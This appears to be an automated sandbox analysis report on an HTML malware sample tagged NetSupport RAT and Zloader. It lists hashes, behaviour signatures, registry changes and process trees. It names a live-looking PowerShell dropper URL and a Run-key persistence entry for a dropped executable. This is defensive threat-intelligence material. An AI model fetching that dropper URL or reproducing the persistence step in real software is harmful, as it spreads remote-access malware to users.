netsupport | 5d554ed83ed475b1537cb7785a1c9139ad2e61ac2c6c8484472d01c2a039595d

Analysis

max time kernel
370s
max time network
372s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
29/09/2022, 13:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1724328616838.html
Size

6KB
MD5

7cec8f7f684cb7a8dadecbfbd0e34177
SHA1

d2e184572cb6504a2cd71a4c74a8063b45c56b77
SHA256

5d554ed83ed475b1537cb7785a1c9139ad2e61ac2c6c8484472d01c2a039595d
SHA512

1efd2c0cef5bce06f600d70e1068a274306e6b2af4dbc16ab791cff3ca9e7b4c2003e269487000b473efbb65a587a213cb7f80acbfa47efc7f73c20a72bb9729
SSDEEP

96:LYyj2Ts4lnMO1KZgupQmjif+fA17UAVIH2tDrJzal4/vhLTdutp4iS56XNrx:Gs4BM/Bp6T1TVmerWiZT8ptSS

Score

10^/10

netsupport zloader botnet persistence rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://thevalueofamoment.com/wp-content/plugins/maintenance/images/

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader

Blocklisted process makes network request 2 IoCs

flow	pid	Process
159	1212	powershell.exe
177	4736	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
1072	presentationhost.exe
4176	presentationhost.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 13 IoCs

pid	Process
1072	presentationhost.exe
1072	presentationhost.exe
1072	presentationhost.exe
1072	presentationhost.exe
1072	presentationhost.exe
1072	presentationhost.exe
1072	presentationhost.exe
4176	presentationhost.exe
4176	presentationhost.exe
4176	presentationhost.exe
4176	presentationhost.exe
4176	presentationhost.exe
4176	presentationhost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoftwareUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\gjcERQyb\\presentationhost.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies Internet Explorer settings 1 TTPs 53 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0d4fb811bd4d801	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30e1d8d71bd4d801	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371231703"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b1421600000000020000000000106600000001000020000000e445e3f0ae04e2b6a85d387bb555b8d62eac4b8a8d1147a44016aca72ebe40e6000000000e80000000020000200000002c0a092d921081819a4897238c98f805162899d2fd5dd0995e4979f0a9032fff40020000d60af5f0900e4214bb9d4db1f04296a028f2cb92482375fb07f4ef20200e3f3db6170c3ff20ae9dc8143a4c65b86c992bf61841a2c0bcb088dbabf9ca58451cef8cbbaceaa9243a2735f27aff03df59e223958f7baed2d2de6606485f8dd125cb467804d12eecc68d4c213ea1149ffdedb09d6f6121027735ba761380eb61d0a9498248a674f1b1ea2b3286b163cec30bd09f8603980ed4cfb7b1253773d45d2cb11dfb0be9a6b963bcbd40dd040535c0ae94116b346b1ade3eb6c885e580358be8e1d13716a5940246308ad644ff736e0d9afdce255c1995ed43a63bb340222d4e9512594f00b713ade86a5c523a982d9cc3c74ebf505088aec30fff1cd60209edd1283c432f9c2aa1e73da4eed775cf09586699f44db20a6974c978899c465a3fca9b2d02eafaea78bdee6c7a5191be59204ba7ab7e724785d28d04400a7a127f350154e87fc09dd173e4e429e5822c58e3dfb2108fc711fd526b3fb3e7db2b3871000f9d5a2975882d605fe62c47e78c7a9fed2da674b507a41d831f3bb731fbce58492de54f14ef2258fbd699e9ae80d0696d41b47dc6b1537b0aa629d84ea307eea6714780b47a69648438129bb912c20c32b48fea8260ea21a787fad1e91d1b3b8ca1e4c5241b165fead45b0f7dbec99247fd5db7cf89e8a4c434c00c07b0b811549e1a1dc237c6581fa9abc5c6eb9d0fbc3f5e94e84398a19b407e84fabf43c415b29e87719a05c6547d279e453962249f4cc8ece3ac997cde51676474edc861e15594c49962270a321cabe924398b0d76e80290dd5dc263e97af9db1400000003674b9dd9d42aca1eb99afc31696d033cc91936eea86fee24ad794fe9a6cb8b5731523ae23d9c1712a3c45ea592d1bd5bc2a25230e98be3ac312546e95c59775	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d07701d81bd4d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30987291"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b14216000000000200000000001066000000010000200000003af7332704609d6a85227ccf8560be4dc4ac8ed5132a9f2ac99bf5a506140dff000000000e8000000002000020000000800bd61ccaae3e12f06f447458557eda0a62575c9228e7a3fb4dc1586849592620000000310ed390f1723b852ac9bf2c602f8e320d2ed694a9860ee6fdd08f4c28da764040000000efbddc55e6f0709ca2657ed1876ba952626ab07c7453cc8d8df8a90a2c215bbe06a0f60b0506ed08d003c9b522abc01688e4ac51ce34e6665c30a40c102d20b5	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30987291"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b1421600000000020000000000106600000001000020000000d95ab0c4d61c9dbafa300d62aeebcd4081f2916c8e534d4123aa3fd745fc1d71000000000e80000000020000200000005afd67c1abe1b7b3e2dc0a5c65744c45e01182d3dbdc3da57236631eac93e4bc200000007dac7c206269f54d18d3e416d41fad5ae5dc83e93f02d1c8c38bb1cae3f5de38400000001b8a34d389c3bb2e5acd6f9b87fdebd0672ff206732b5a29151297d517344432437be0604acfa466ef8849047e4c9e3b6ef8ae11cd8d1c216710ce78bae19151	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30987291"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2317333372"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{ABF63D8F-400E-11ED-B696-5203DB9D3E0F} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0bcc1821bd4d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2317333372"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30987291"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b14216000000000200000000001066000000010000200000002b9ed75fa476c287829611619b5cf19439cf022bb90ff840a0506b594ed2dca1000000000e800000000200002000000051e3fa08686bdbec4565620886889dc59c0d841173792fb1cda16bb5a81da10520000000df1645c99733bbed0c5dcca66b5b44a6fc778deba6d95753373f59e3a462c772400000005f36bcd239a7af29f8f37624cca1871ce74d9a5827de772e18e06712dddc469917c43394204f202928c814630cde9a415e1600a73fc7c5636cb1f95b61ec76c0	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b142160000000002000000000010660000000100002000000004e20a3339781ae234219412f2a8f45d677751f755bbd8a9ccc8feca22ef4391000000000e8000000002000020000000856acdad76fdabb60145fe3b3035451e8c622c787304d734444099a2b197375d2000000028b823c9ed43be2b0a267ae1c93ae400efad962ff07327a640e5216c53d1debc40000000716f9f81cc4f6242787ca1d0881c43e8a40adc23722a0226d83b81fa0c7a888336d800eba916cab01719eba6cf5b280ec44f0840b35a7b8092860ca15aad65e3	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2306395541"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2306395541"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b1421600000000020000000000106600000001000020000000ea9cca3ca6dfda452b7a4db24c6b6855841df45b7ded25506f7bb3d0b70f9c94000000000e80000000020000200000004e5c78d06eb9601f6ad1d954cf861994df3bf1f70ba707425ed91fb074d941ca200000005e2848645434820a3b6e94e04c726d64e52439418aef22c90c9640d86872091f400000007dcf80807f583e64665e733b92e4fc85f310d57805a457eed9c78ce03286e3a93547eb026aee8f026f9b00773b8aaf763ef0a220e561a446338b0801fccb54b2	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0530a821bd4d801	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b14216000000000200000000001066000000010000200000009f99a55963995373cfced835e4b969eb1a07987e4205d052011adbac3dee09b8000000000e8000000002000020000000c4026583aaad01c760247cc50d59b912e2bd6e5add988b3707414dc429e37323400200002a377a6891887b165f45add735c55a53608a0170c08a2caeb218ec625d3d9ba47128c9124d072a19c769d77b5072bbb2e20c0ba4c92314645d2557cc71e04ba291971173c4b3394a65a08417aee0052eefcfb7080728968a9f5240853c27b1b075e2728b89d56086fc15943ea2bcae851f2db127c3edd89a814d291f53bcac1387e6bbf7a428ce5bf03524893231ce463c81c7fd55ec8f57b6163d66c6add102c951dc92964be19fa3df71659ff89bc9c704e6c9d85b41a84b6f52da67dd495cb2fd6fe2cf76d3c087dc4bb20aef1dd007d7afcb9206fc34904b6b41f596ad81139a66613ec929f63308bed0fdff9f6f855574fdeb46570e42116580411fdb4ad996ab67c9b787259419b80424be3c6f9a63da518655d163d4f4ec0149344c19458d8bf563b48f4c86c51053bf992ce687b57909c3158c5be072ff90f1b749c4ab88f4bd954c91102a4c58fc9112851be476743c2d0e77664d4b84ff64d291b20154ef1b3afafd89fb79800c650f4b2bdf8c2ec6cd6721f211eccbc5d78d8a2b2f2204fd2196e608df50207983379040add66a0e5b2ff9a984eeeae486cd6a38312e3c16a78cf51d8035f8da34271883b83f35afcf35cc0e3b57433e71c3aaf89892ae28b7161c9eb1ad4e6bf2d180392f2463790a00a59803bf0670241467cbc9c0ab2ec9c50b401ac85586a385f551a6a7ea5beee26131b1e1a7c024c940ee2aaa14fe87eb4cd2e8ff7bcc4b482b8b3e9353daed4e7f74945c8e7de5c6420ee9ee95d3caafb4fdde101794375b4933109f0e00bf6451c7aa35d07d14a8f03b400000007b4ce9c19e6e0bcd6aacca6a8700a62945e83ba5e990b845fd11e88beab327427c362b49b4830515ff320c73765a79b29b97926f7f640ab942192dae2859d189	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b1421600000000020000000000106600000001000020000000086b13d32bf34e92efbde366879d1925ce03d78b0d6fa48bb982b839a7a3e5ec000000000e80000000020000200000005d6658d652138cd424701b52909d2f198582bad3158948e4a6a19f80773d312e40020000f70e6c919acd3fc00abf5862611cdddeb725866c6dbd425d71600e1b27a0199a5f598d94b7d40ca81fe5d2a32d7743ed36c719ad91e7906281bbdbf4cd5c65b6de30d3c2f07aa990596bf967f1162d583b10ba488339b8318a6c89bcf59419107184895d5f4cf157ba2800bd26b26f77ea4f2e6677b722be55fa51c3a03eec366b019ea3a8fd94835c5880a9e3d1f0294735920ef9ff8010d9d7f4c4112202fc4e2f74ab3653ad4a57b52d650da52083f883a72c8b933b292ac428fc0516667cd418111da5219d02643c27b4ffb910cf9c0c3eaf219d05e05720621e5df3ce31179b2e02b26624e6237b31affeadf43a3f6abf0dee9ccd5800f6ee4b179e89d08823c3abe5bcf86fbae861fd4fd30e6bf10013f0d61ddcd7ea1f194953eafb8f3a9be2145097e91e268db746303a06ef368aaeb2fc95e5c27494696f1c06717667951f7c828cc9f7be6c3402e40bef755dece541337410f0b758e1f9a71cdb1a1a9260c564d6d9552e6b4da5008b167e40e03096a9e3ff8ef6e0ac621dbcd65e35ae021e11a6b8d711e4ad900860c2bfc1aaa0f1e05186b1d6cac914088c93345a209a70cadb393eb4f821ec6d0bb5c0331cf8bfc6f1a0150e3351fd8878af4adffed12978ab6030b5db2c972d801cd787b78fe6c8b51a905dfb8776dd8aa10de4682c356187d982590f2e89fa3ac8cea897e2ff825cba33e28515e0cbf6ddcdadd3fa6fdd836010399536d81056607d96f0301d13e5ac028404d4b006b538716f095302263f04a875079bfbe3c9be1e3cbb45d2645659a55d7076efe7c1dd13400000002ff86bfb8077c934877f87679ceb68d7370f3d52ca431f784c8613f285c61e59d4baea2adc719103b71b960a84f3175fb928ad04d8a08eb3cc004ea545d23421	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	chrome.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2192	Notepad.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
240	chrome.exe
240	chrome.exe
3896	chrome.exe
3896	chrome.exe
1036	chrome.exe
1036	chrome.exe
4688	chrome.exe
4688	chrome.exe
3180	chrome.exe
3180	chrome.exe
1212	powershell.exe
1212	powershell.exe
1212	powershell.exe
3260	chrome.exe
3260	chrome.exe
1960	chrome.exe
1960	chrome.exe
1964	chrome.exe
1964	chrome.exe
4736	powershell.exe
4736	powershell.exe
4736	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4308	iexplore.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeRestorePrivilege	4176	7zG.exe
Token: 35	4176	7zG.exe
Token: SeSecurityPrivilege	4176	7zG.exe
Token: SeSecurityPrivilege	4176	7zG.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeSecurityPrivilege	1072	presentationhost.exe
Token: SeDebugPrivilege	4736	powershell.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
4308	iexplore.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
4176	7zG.exe
1072	presentationhost.exe
3896	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
4308	iexplore.exe
4308	iexplore.exe
660	IEXPLORE.EXE
660	IEXPLORE.EXE
660	IEXPLORE.EXE
660	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4308 wrote to memory of 660	4308	iexplore.exe	79
PID 4308 wrote to memory of 660	4308	iexplore.exe	79
PID 4308 wrote to memory of 660	4308	iexplore.exe	79
PID 3896 wrote to memory of 1092	3896	chrome.exe	98
PID 3896 wrote to memory of 1092	3896	chrome.exe	98
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 212	3896	chrome.exe	99
PID 3896 wrote to memory of 240	3896	chrome.exe	100
PID 3896 wrote to memory of 240	3896	chrome.exe	100
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101
PID 3896 wrote to memory of 1048	3896	chrome.exe	101

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\1724328616838.html
1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4308
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4308 CREDAT:17410 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
